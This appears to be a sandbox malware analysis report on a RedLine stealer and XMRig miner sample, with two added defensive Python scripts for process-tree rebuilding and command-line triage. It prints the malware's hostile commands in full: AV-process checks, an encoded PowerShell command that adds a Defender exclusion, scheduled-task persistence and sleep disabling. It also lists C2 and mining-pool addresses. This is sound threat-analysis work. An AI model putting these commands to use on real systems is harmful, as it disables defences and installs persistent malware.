Malware Analysis Report

2025-03-15 04:45

Sample ID 240714-1eennswhmb
Target modest-menu.exe
SHA256 af05a42171b74bc253d3acee98761fd7f931b54d36ff76425b328c9aab9daf51
Tags
redline xmrig @mass1vexdd discovery execution infostealer miner persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

af05a42171b74bc253d3acee98761fd7f931b54d36ff76425b328c9aab9daf51

Threat Level: Known bad

The file modest-menu.exe was found to be: Known bad.

Malicious Activity Summary

redline xmrig @mass1vexdd discovery execution infostealer miner persistence spyware stealer

XMRig Miner payload

xmrig

RedLine

RedLine payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Downloads MZ/PE file

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Power Settings

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Unsigned PE

Scheduled Task/Job: Scheduled Task

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Views/modifies file attributes

Enumerates processes with tasklist

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-14 21:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-14 21:33

Reported

2024-07-14 22:20

Platform

win11-20240709-en

Max time kernel

1800s

Max time network

1792s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 240 created 3276 N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif C:\Windows\Explorer.EXE

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Downloads MZ/PE file

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Hits
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A 10
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A 5
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A 1
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A 2
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A 2
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A 44

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege, shown by LUID) N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege, shown by LUID) N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege, shown by LUID) N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Dllhost\dllhost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Dllhost\winlogson.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Dllhost\winlogson.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target Writes
PID 3156 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\modest-menu.exe C:\Windows\SysWOW64\cmd.exe 3
PID 1836 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe 3
PID 1836 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe 3
PID 1836 wrote to memory of 2576 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe 3
PID 1836 wrote to memory of 3836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe 3
PID 1836 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe 3
PID 1836 wrote to memory of 3740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe 3
PID 1836 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe 3
PID 1836 wrote to memory of 240 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif 3
PID 1836 wrote to memory of 3948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe 3
PID 240 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe 5
PID 1508 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe 3
PID 3952 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\conhost.exe C:\Windows\system32\cmd.exe 2
PID 924 wrote to memory of 236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com 2
PID 924 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe 2
PID 924 wrote to memory of 1884 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe 2
PID 924 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe 2
PID 924 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe 2
PID 924 wrote to memory of 4936 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\Installer.exe 3
PID 4936 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe 3
PID 2476 wrote to memory of 2932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 3
PID 4936 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe 3
PID 4936 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe 2
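The WriteProcessMemory table is enough to rebuild the process tree and to spot the one parent that kept writing into a child after spawning it. The parser below is an added example written for this report, not the sandbox's own code or the sample's: it embeds a subset of the rows above in the sandbox's raw one-row-per-write form (it also accepts rows that carry a trailing write count), and the threshold it uses to flag injection candidates (more than three writes from parent to child) is an assumption, not a sandbox rule.

```python
"""Rebuild the process tree from the WriteProcessMemory rows of a sandbox report."""
import re
from collections import Counter, defaultdict

# Rows copied from the WriteProcessMemory table of this report (a subset).
# The sandbox emits one row per write, so an ordinary spawn shows up as 2-3
# identical rows; Ottawa.pif -> RegAsm.exe is the only pair with more.
ROWS = r"""
PID 3156 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\modest-menu.exe C:\Windows\SysWOW64\cmd.exe
PID 3156 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\modest-menu.exe C:\Windows\SysWOW64\cmd.exe
PID 3156 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\modest-menu.exe C:\Windows\SysWOW64\cmd.exe
PID 1836 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1836 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1836 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1836 wrote to memory of 240 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif
PID 1836 wrote to memory of 240 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif
PID 1836 wrote to memory of 240 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif
PID 240 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe
PID 240 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe
PID 240 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe
PID 240 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe
PID 240 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe
PID 1508 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 1508 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 1508 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 3952 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\conhost.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\conhost.exe C:\Windows\system32\cmd.exe
PID 924 wrote to memory of 4936 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
PID 924 wrote to memory of 4936 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
PID 924 wrote to memory of 4936 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
PID 4936 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 4936 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 4936 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"""

# Raw row, optionally followed by a write count when the table has been collapsed.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)(?: (\d+))?$")


def parse_rows(text):
    """Return ({pid: image path}, Counter{(parent, child): number of writes})."""
    names, writes = {}, Counter()
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # tolerate a pasted header line or blank lines
        parent, child = int(m.group(1)), int(m.group(2))
        names.setdefault(parent, m.group(3))
        names.setdefault(child, m.group(4))
        writes[(parent, child)] += int(m.group(5) or 1)
    return names, writes


def children_of(writes):
    """Parent PID -> child PIDs, in first-seen order (Counter keeps insertion order)."""
    kids = defaultdict(list)
    for parent, child in writes:
        kids[parent].append(child)
    return kids


def roots(names, writes):
    """PIDs that are never a write target: the tree's entry points."""
    targets = {child for _, child in writes}
    return [pid for pid in names if pid not in targets]


def render_tree(names, kids, pid, depth=0):
    """Indented lines of 'pid basename', depth-first from pid."""
    lines = [f"{'  ' * depth}{pid} {names[pid].rsplit(chr(92), 1)[-1]}"]
    for child in kids.get(pid, []):
        lines.extend(render_tree(names, kids, child, depth + 1))
    return lines


def injection_candidates(writes, spawn_writes=3):
    """Pairs written to more often than a plain spawn (assumed <= 3 writes)."""
    return [(p, c, n) for (p, c), n in writes.items() if n > spawn_writes]


if __name__ == "__main__":
    names, writes = parse_rows(ROWS)
    kids = children_of(writes)
    for root in roots(names, writes):
        print("\n".join(render_tree(names, kids, root)))
    print("injection candidates:", injection_candidates(writes))
</test>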

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\modest-menu.exe

"C:\Users\Admin\AppData\Local\Temp\modest-menu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Army Army.cmd & Army.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 340417

C:\Windows\SysWOW64\findstr.exe

findstr /V "offeringsproductivityjmas" Adventures

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Might + Friendly + Patrol 340417\U

C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif

340417\Ottawa.pif 340417\U

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\conhost.exe

"C:\Users\Admin\AppData\Local\Temp\conhost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p2201249071693326612168609430 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "Installer.exe"

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

"Installer.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjADUAbgB2AGMAVgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAVwBkAEcATABtAFYATgBxAFMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBKACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAQwAyAGEATwBlAFkAcABZADYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjADUAbgB2AGMAVgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAVwBkAEcATABtAFYATgBxAFMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBKACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAQwAyAGEATwBlAFkAcABZADYAIwA+AA=="

Decoded (-EncodedCommand is base64 over UTF-16LE): <#5nvcV#> Add-MpPreference <#vWdGLmVNqS#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#vJ#> -Force <#hC2aOeYpY6#>. With the junk <# ... #> block comments removed this is Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, a Microsoft Defender exclusion covering the whole user profile and the whole system drive.

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8489" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8489" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\ProgramData\Dllhost\dllhost.exe

C:\ProgramData\Dllhost\dllhost.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\ProgramData\Dllhost\winlogson.exe

C:\ProgramData\Dllhost\winlogson.exe -c config.json
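The command lines in this section (the -EncodedCommand PowerShell, the powercfg chain, the SCHTASKS /CREATE entries and the tasklist | findstr AV checks) are the parts of this sample a detection engineer would want to match on. The script below is an added example written for this report, not sandbox output or the sample's code: it decodes the encoded command the way PowerShell does (base64 over UTF-16LE), strips the <# ... #> comment junk, and triages each command line. The encoded string and the command lines are copied from the Processes section; the finding labels, the list of user-writable task paths and the AV image-name list are this example's own assumptions.

```python
"""Decode the -EncodedCommand seen above and triage the recorded command lines."""
import base64
import binascii
import re

# Copied verbatim from the powershell.exe entry of this report.
ENCODED = (
    "PAAjADUAbgB2AGMAVgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYA"
    "VwBkAEcATABtAFYATgBxAFMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQA"
    "ZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkA"
    "dgBlACkAIAA8ACMAdgBKACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAQwAyAGEATwBlAFkAcABZADYAIwA+AA=="
)

# -e / -ec / -enc / -encodedcommand followed by a base64 blob (quotes optional).
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+\"?([A-Za-z0-9+/=]{16,})", re.I)
BLOCK_COMMENT_RE = re.compile(r"<#.*?#>", re.S)
DEFENDER_EXCL_RE = re.compile(
    r"add-mppreference\b.*?-exclusion(?:path|process|extension|ipaddress)", re.I)
POWERCFG_RE = re.compile(
    r"powercfg\b.*?(?:/hibernate\s+off|-(?:standby|hibernate|monitor)-timeout-(?:ac|dc)\s+0)",
    re.I)
SCHTASKS_CREATE_RE = re.compile(r"schtasks\b.*?/create\b", re.I)
TASK_RUN_RE = re.compile(r"/tr\s+\"?([^\"&]+)", re.I)
# Assumed list of locations a scheduled task should not normally run from.
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\users\\public\\", "\\temp\\")
# Security-product image names the sample grepped for with tasklist | findstr.
AV_PROCESSES = ("wrsa.exe", "opssvc.exe", "avastui.exe", "avgui.exe",
                "bdservicehost.exe", "nswscsvc.exe", "sophoshealth.exe")


def decode_encoded_command(b64):
    """-EncodedCommand is base64 over UTF-16LE; return None if the blob is not."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def strip_block_comments(script):
    """Drop <# ... #> comments (used here purely as junk) and squeeze whitespace."""
    return re.sub(r"\s+", " ", BLOCK_COMMENT_RE.sub("", script)).strip()


def triage(cmdline):
    """Return the list of findings (assumed labels) for one command line."""
    findings = []
    m = ENC_RE.search(cmdline)
    if m:
        findings.append("encoded_powershell")
        decoded = decode_encoded_command(m.group(1))
        if decoded and DEFENDER_EXCL_RE.search(strip_block_comments(decoded)):
            findings.append("defender_exclusion")
    low = cmdline.lower()
    if "findstr" in low and any(p in low for p in AV_PROCESSES):
        findings.append("av_process_check")
    if POWERCFG_RE.search(cmdline):
        findings.append("sleep_disabled")  # keeps a miner host awake
    if SCHTASKS_CREATE_RE.search(cmdline):
        t = TASK_RUN_RE.search(cmdline)
        if t and any(d in t.group(1).lower() for d in USER_WRITABLE):
            findings.append("scheduled_task_userwritable_path")
    return findings


# Command lines copied from the Processes section of this report.
COMMAND_LINES = [
    r'"C:\Windows\System32\cmd.exe" /k copy Army Army.cmd & Army.cmd & exit',
    r'findstr /I "wrsa.exe opssvc.exe"',
    'powershell -EncodedCommand "' + ENCODED + '"',
    '"cmd.exe" /C powershell -EncodedCommand "' + ENCODED + '" & powercfg /x -hibernate-timeout-ac 0 '
    '& powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 '
    '& powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off',
    r'SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"',
    r'"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json',
    r"mode 65,10",
]


def triage_all(cmdlines=COMMAND_LINES):
    return [(cl, triage(cl)) for cl in cmdlines]


if __name__ == "__main__":
    print(strip_block_comments(decode_encoded_command(ENCODED)))
    for cl, found in triage_all():
        print(found or "-", "<-", cl[:70])
```

The winlogson.exe -c config.json line deliberately produces no finding: the only thing that identifies it as a miner launch is the XMRig payload signature and the pool.hashvault.pro connection in the Network section, not the command line itself, so a command-line rule for it would be a guess.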

Network

Country  Destination          Domain                      Proto
US       8.8.8.8:53           8.8.8.8.in-addr.arpa        udp
US       8.8.8.8:53           72.32.126.40.in-addr.arpa   udp
RU       85.28.47.132:80      -                           tcp
US       172.67.75.172:443    api.ip.sb                   tcp
DE       147.45.47.81:80      147.45.47.81                tcp
US       104.20.4.235:443     pastebin.com                tcp
DE       147.45.47.81:80      147.45.47.81                tcp
DE       147.45.47.81:80      147.45.47.81                tcp
DE       45.76.89.70:443      pool.hashvault.pro          tcp

Files

C:\Users\Admin\AppData\Local\Temp\Army.cmd

MD5 e2425d43cd54cc723943e30a4f033694
SHA1 9456e4517c0fbb4a6aacf3ba4aa43df30c0ba005
SHA256 26248feff6ebf8f67a2d1ee44f28aa9a6bfa7a40577f87d234a2c004ac23c7b0
SHA512 f165fb45f01b8aa7cf326cbea282bcc8731f2eb8e3ce9f6f9ba5514d1d7cfd48244f211b84e103f8e3bab5b028f5675efc5912c8d0a5fcbb1041ae1c219da788

C:\Users\Admin\AppData\Local\Temp\Adventures

MD5 0ee94f8cad492b5fd03a9dd231c60a18
SHA1 6ecdb895598c0c5f6be511dceca17067a036e0b8
SHA256 8357ce1b051f7177a5e6a6ca979fbd822749460f96a6b6018a4e104304d7c40a
SHA512 ac51e99ffe955eb8e42b2e40e171fccdf27ddd630f5667c51f1897e0dc001afc8a70fcefcf10ee77af63c47273e94d92f1efbaa31501d462ec33402f2a96a07e

C:\Users\Admin\AppData\Local\Temp\Kruger

MD5 6c62d09f1e027adb68b159e9454a0ab0
SHA1 ab09092207492307c8c35ae074affdbb368d9c82
SHA256 a431c79eaa6c284843e59ba31f8a55e5dc069bc0b4d2983b495d3cd47c1d4885
SHA512 6a2c2ebcb6369f35b928441b0dca7b8c6f2600f58fb80c7a59e9f7fe919b6ca9c81acd23ada03975b43e302adc509d21107caef3d58221806e219ff527b62eb8

C:\Users\Admin\AppData\Local\Temp\Camping

MD5 c11316a56cedd333a9d41f09e16e38ad
SHA1 9860a34080713ce8afa6e0bab9334bda6cc1c465
SHA256 84af8a2ec9ef74d5ac1a4dee820ab3636ac164c51fe947b494e4069b0149c106
SHA512 9bd57a1d6e3d259679b56462236d95287acd4e3758db116db675d913c61b6ee4f95adaa1ea335649c7df0a866b51e7314570571d376f7e5f74d88e3c8fb9e4ba

C:\Users\Admin\AppData\Local\Temp\Impaired

MD5 a9111d61b308c03dfdf02065eaaf41af
SHA1 ca5561fa32672035b126f58d4b402bcbaa25a07f
SHA256 8621c33f49c03102038d49dad1e0f1f06205e90d764adbd149f8b606e180e574
SHA512 5583cff5b1766eb8c5eb000b8b1120f7d1b41d91761f1a9ec4d77573734766c03f6bfe0343b97b7cef21018ab88c3bf565cc2408eeb5630ad08a24c4e4d4b5b6

C:\Users\Admin\AppData\Local\Temp\Spatial

MD5 ac5081d9b765a4b9871c77987db9b95b
SHA1 adf6c3155d2514c9df8fb39afb96560b42e35b3f
SHA256 b5712cf8b41779a6edbe669bedf5f5083a975489d182bd5411f42c06f64f6a21
SHA512 ed01fe4b788a0f160b57f5495aa720a64813102726abc5e1a8e297238ea3e6b37caa3a7143fa672f670052b1b480d3fb1f8531895c93b339b2b177950e0bd1b7

C:\Users\Admin\AppData\Local\Temp\Par

MD5 03d8d764df24cdc61c097419f1c91777
SHA1 9fce8e42f71c3971975593c445d5d6d763e6da29
SHA256 cfad89b9e65fe178e18209d79a43e61c01d156fed6d3a5e42582d1d2bae569c5
SHA512 96f3c644b9cdb87ca1f324b0b60070568fcc4246db3375267b71dfdf7fb1c23ba7ce6b92e7256324b6e85dc2dff8c984e38fbeb6ac1cbbef75698da6321a466e

C:\Users\Admin\AppData\Local\Temp\Ebay

MD5 d6538826f2149a24a511c2687b958a39
SHA1 cb9cadd19ed5045b2dbdd864dcb8f4e854afc29f
SHA256 25c90c9641d5c57450ac7408ec660186ae670002093b719e3845797de828a1c1
SHA512 0829a6d91a1d899ccb131e0eddd7d63a46f7300bf344f30fd37f82ad516b9b62fb6bc8b3b9bc576e3c4618f1a2f626e9eb263bae91c38ce6d6bdf791f9a782fc

C:\Users\Admin\AppData\Local\Temp\Money

MD5 cea9a8ce470c95945a43dff5240ddfe2
SHA1 74395aa3c23a197d705f6ff1b5128f2e677d480c
SHA256 e55512924dc8270e239e538a548fdd29e1c8d3a0957bc0bd4e3bd45054c8c4c7
SHA512 26f1b37d584fb10d248dadc06c68d761ec5d43d28f9c74b1a4d0dfba15bfa851cd7b8046b663f3275078eb33e964c965fe1cf37752e8bbef5dfcb99028684d30

